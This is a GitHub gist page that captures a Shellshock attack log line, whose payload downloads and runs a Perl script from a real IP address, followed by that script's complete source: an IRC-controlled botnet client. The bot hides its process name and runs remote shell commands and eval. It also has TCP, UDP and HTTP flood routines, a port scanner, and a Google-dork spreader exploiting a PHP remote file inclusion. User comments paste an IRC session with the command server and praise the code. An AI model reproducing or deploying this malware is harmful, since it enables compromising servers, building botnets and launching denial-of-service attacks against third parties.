Create a gist now

Instantly share code, notes, and snippets.

@mbulat /jur
Created Sep 25, 2014

What would you like to do?
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22
#!/usr/bin/perl
# this spreader is coded by xdh
# xdh@xxxxxxxxxxx
# only for testing...
my @nickname = ("|PHP|");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
#system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`");
my $processo = '/usr/sbin/atd';
# funny world...
my $linas_max='6';
my $sleep='5';
my @adms=("JB","x");
my @hostauth=("fuckoff","localhost");
my @canais=("#new");
chop (my $realname = 'vn');
$servidor='185.31.209.84' unless $servidor;
my $porta='443';
my $VERSAO = 'BUCEFALO';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
#$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sendraw("PASS swedenrocks");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout
=> 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1."
seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1."
seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for
".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent
".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx",
"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}

Xe commented Sep 25, 2014

:FUCK.COM 001 a :Welcome to the XpowerHost IRC Network a!a@tor-exit-node.15.privacyrepublic.org
:FUCK.COM 002 a :Your host is FUCK.COM, running version Unreal3.2.10.4
:FUCK.COM 003 a :This server was created Tue Sep 16 2014 at 16:31:36 CEST
:FUCK.COM 004 a FUCK.COM Unreal3.2.10.4 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
:FUCK.COM 005 a CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=15 CHANLIMIT=#:15 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 :are supported by this server
:FUCK.COM 005 a MAXTARGETS=20 WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ NETWORK=XpowerHost CASEMAPPING=ascii EXTBAN=~,qjncrRa ELIST=MNUCT :are supported by this server
:FUCK.COM 005 a STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:FUCK.COM 251 a :There are 1 users and 721 invisible on 1 servers
:FUCK.COM 252 a 2 :operator(s) online
:FUCK.COM 253 a 40 :unknown connection(s)
:FUCK.COM 254 a 9 :channels formed
:FUCK.COM 255 a :I have 722 clients and 0 servers
:FUCK.COM 265 a 722 839 :Current local users 722, max 839
:FUCK.COM 266 a 722 725 :Current global users 722, max 725
:FUCK.COM 422 a :MOTD File is missing
:a MODE a :+iwx
LIST
:FUCK.COM 321 a Channel :Users  Name
:FUCK.COM 322 a # 553 :[+ntu] 
:FUCK.COM 322 a #d 476 :[+ntu] 
:FUCK.COM 322 a #f 476 :[+mnt] 
:FUCK.COM 322 a #p 577 :[+mnt] 
:FUCK.COM 322 a #x 577 :[+nt] 
:FUCK.COM 322 a #114 617 :[+ntu] 
:FUCK.COM 322 a #new 106 :[+ntu] 
:FUCK.COM 322 a #Mix 100 :[+nt] 
:FUCK.COM 322 a #vai 100 :[+mnt] 
:FUCK.COM 323 a :End of /LIST
JOIN a
:FUCK.COM NOTICE a :*** You are permanently banned from XpowerHost (no reason)
ERROR :Closing Link: a[tor-exit-node.15.privacyrepublic.org] (User has been permanently banned from XpowerHost (no reason))

Also seen this one on some of my servers.

Nice code, i'l try and make a python version for it, seeking permission

You can use this script on few servers... But i think the most websites are secure because they not forwarding SSH Port to public.
Or they not using CGI ...

Lové it

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment